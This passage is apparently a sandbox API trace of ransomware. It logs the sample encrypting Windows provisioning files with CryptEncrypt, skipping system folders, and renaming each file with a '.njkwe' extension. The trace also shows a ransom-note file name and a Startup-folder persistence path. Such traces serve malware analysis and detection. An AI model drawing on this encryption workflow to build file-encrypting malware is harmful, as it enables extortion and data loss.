nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.892] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.892] CloseHandle (hObject=0x43c) returned 1 [0078.893] GetProcessHeap () returned 0xbe0000 [0078.893] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.893] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\392__Connections_Cellular_Orange (Slovakia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0078.893] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\392__Connections_Cellular_Orange (Slovakia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\392__connections_cellular_orange (slovakia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\392__Connections_Cellular_Orange (Slovakia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\392__connections_cellular_orange (slovakia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.893] GetProcessHeap () returned 0xbe0000 [0078.893] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.893] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90e5a314, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90e5a314, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90e5a314, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="393__Connections_Cellular_Slovak Telekom (Slovakia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="393__C~1.PRO")) returned 1 [0078.893] lstrcmpiW (lpString1="393__Connections_Cellular_Slovak Telekom (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.893] lstrcmpiW (lpString1="393__Connections_Cellular_Slovak Telekom (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.893] lstrcmpiW (lpString1="393__Connections_Cellular_Slovak Telekom (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.893] lstrcmpiW (lpString1="393__Connections_Cellular_Slovak Telekom (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.893] lstrcmpiW (lpString1="393__Connections_Cellular_Slovak Telekom (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.893] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\393__Connections_Cellular_Slovak Telekom (Slovakia)_i0$(__MVID)@WAP.provxml") returned 169 [0078.894] StrStrIW (lpFirst="393__Connections_Cellular_Slovak Telekom (Slovakia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.894] lstrcmpW (lpString1="393__Connections_Cellular_Slovak Telekom (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.894] lstrcmpW (lpString1="393__Connections_Cellular_Slovak Telekom (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.894] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\393__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.894] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\393__Connections_Cellular_Slovak Telekom (Slovakia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\393__connections_cellular_slovak telekom (slovakia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.894] GetTickCount () returned 0x11540ce [0078.894] GetTickCount () returned 0x11540ce [0078.894] GetTickCount () returned 0x11540ce [0078.894] GetTickCount () returned 0x11540ce [0078.894] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.894] GetProcessHeap () returned 0xbe0000 [0078.894] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.894] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2d2, lpOverlapped=0x0) returned 1 [0078.896] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.896] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2d2, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2d2, lpOverlapped=0x0) returned 1 [0078.896] GetProcessHeap () returned 0xbe0000 [0078.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.896] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.896] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.896] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.896] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.896] CloseHandle (hObject=0x43c) returned 1 [0078.896] GetProcessHeap () returned 0xbe0000 [0078.896] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.896] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\393__Connections_Cellular_Slovak Telekom (Slovakia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 189 [0078.896] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\393__Connections_Cellular_Slovak Telekom (Slovakia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\393__connections_cellular_slovak telekom (slovakia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\393__Connections_Cellular_Slovak Telekom (Slovakia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\393__connections_cellular_slovak telekom (slovakia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.897] GetProcessHeap () returned 0xbe0000 [0078.897] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.897] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90e5a314, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90e5a314, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90e80580, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x285, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="394__Connections_Cellular_T-Mobile (Slovakia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="394__C~1.PRO")) returned 1 [0078.897] lstrcmpiW (lpString1="394__Connections_Cellular_T-Mobile (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.897] lstrcmpiW (lpString1="394__Connections_Cellular_T-Mobile (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.897] lstrcmpiW (lpString1="394__Connections_Cellular_T-Mobile (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.897] lstrcmpiW (lpString1="394__Connections_Cellular_T-Mobile (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.897] lstrcmpiW (lpString1="394__Connections_Cellular_T-Mobile (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.897] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\394__Connections_Cellular_T-Mobile (Slovakia)_i0$(__MVID)@WAP.provxml") returned 163 [0078.897] StrStrIW (lpFirst="394__Connections_Cellular_T-Mobile (Slovakia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.897] lstrcmpW (lpString1="394__Connections_Cellular_T-Mobile (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.897] lstrcmpW (lpString1="394__Connections_Cellular_T-Mobile (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.897] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\394__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.897] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\394__Connections_Cellular_T-Mobile (Slovakia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\394__connections_cellular_t-mobile (slovakia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.898] GetTickCount () returned 0x11540ce [0078.898] GetTickCount () returned 0x11540ce [0078.898] GetTickCount () returned 0x11540ce [0078.898] GetTickCount () returned 0x11540ce [0078.898] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.898] GetProcessHeap () returned 0xbe0000 [0078.898] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.898] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x285, lpOverlapped=0x0) returned 1 [0078.900] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.900] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x285, lpOverlapped=0x0) returned 1 [0078.900] GetProcessHeap () returned 0xbe0000 [0078.900] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.900] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.900] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.900] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.900] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.900] CloseHandle (hObject=0x43c) returned 1 [0078.900] GetProcessHeap () returned 0xbe0000 [0078.900] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.900] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\394__Connections_Cellular_T-Mobile (Slovakia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0078.901] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\394__Connections_Cellular_T-Mobile (Slovakia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\394__connections_cellular_t-mobile (slovakia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\394__Connections_Cellular_T-Mobile (Slovakia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\394__connections_cellular_t-mobile (slovakia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.901] GetProcessHeap () returned 0xbe0000 [0078.901] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.901] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90e80580, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90e80580, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90e80580, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="395__Connections_Cellular_Mobitel (Slovenia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="395__C~1.PRO")) returned 1 [0078.901] lstrcmpiW (lpString1="395__Connections_Cellular_Mobitel (Slovenia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.901] lstrcmpiW (lpString1="395__Connections_Cellular_Mobitel (Slovenia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.901] lstrcmpiW (lpString1="395__Connections_Cellular_Mobitel (Slovenia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.901] lstrcmpiW (lpString1="395__Connections_Cellular_Mobitel (Slovenia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.901] lstrcmpiW (lpString1="395__Connections_Cellular_Mobitel (Slovenia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.901] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\395__Connections_Cellular_Mobitel (Slovenia)_i0$(__MVID)@WAP.provxml") returned 162 [0078.901] StrStrIW (lpFirst="395__Connections_Cellular_Mobitel (Slovenia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.901] lstrcmpW (lpString1="395__Connections_Cellular_Mobitel (Slovenia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.901] lstrcmpW (lpString1="395__Connections_Cellular_Mobitel (Slovenia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.901] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\395__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.902] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\395__Connections_Cellular_Mobitel (Slovenia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\395__connections_cellular_mobitel (slovenia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.902] GetTickCount () returned 0x11540ce [0078.902] GetTickCount () returned 0x11540ce [0078.902] GetTickCount () returned 0x11540ce [0078.902] GetTickCount () returned 0x11540ce [0078.902] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.902] GetProcessHeap () returned 0xbe0000 [0078.902] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.902] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2c7, lpOverlapped=0x0) returned 1 [0078.976] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd39, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.976] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2c7, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2c7, lpOverlapped=0x0) returned 1 [0078.976] GetProcessHeap () returned 0xbe0000 [0078.976] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.976] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.976] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.976] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.976] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.977] CloseHandle (hObject=0x43c) returned 1 [0078.977] GetProcessHeap () returned 0xbe0000 [0078.977] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.977] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\395__Connections_Cellular_Mobitel (Slovenia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0078.977] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\395__Connections_Cellular_Mobitel (Slovenia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\395__connections_cellular_mobitel (slovenia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\395__Connections_Cellular_Mobitel (Slovenia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\395__connections_cellular_mobitel (slovenia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.978] GetProcessHeap () returned 0xbe0000 [0078.978] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.978] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90e80580, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90e80580, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90e80580, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x354, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="396__Connections_Cellular_Si.mobil (Slovenia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="396__C~1.PRO")) returned 1 [0078.978] lstrcmpiW (lpString1="396__Connections_Cellular_Si.mobil (Slovenia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.978] lstrcmpiW (lpString1="396__Connections_Cellular_Si.mobil (Slovenia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.978] lstrcmpiW (lpString1="396__Connections_Cellular_Si.mobil (Slovenia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.979] lstrcmpiW (lpString1="396__Connections_Cellular_Si.mobil (Slovenia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.979] lstrcmpiW (lpString1="396__Connections_Cellular_Si.mobil (Slovenia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.979] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\396__Connections_Cellular_Si.mobil (Slovenia)_i0$(__MVID)@WAP.provxml") returned 163 [0078.979] StrStrIW (lpFirst="396__Connections_Cellular_Si.mobil (Slovenia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.979] lstrcmpW (lpString1="396__Connections_Cellular_Si.mobil (Slovenia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.979] lstrcmpW (lpString1="396__Connections_Cellular_Si.mobil (Slovenia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.979] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\396__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.979] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\396__Connections_Cellular_Si.mobil (Slovenia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\396__connections_cellular_si.mobil (slovenia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.979] GetTickCount () returned 0x115411c [0078.980] GetTickCount () returned 0x115411c [0078.980] GetTickCount () returned 0x115411c [0078.980] GetTickCount () returned 0x115411c [0078.980] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.980] 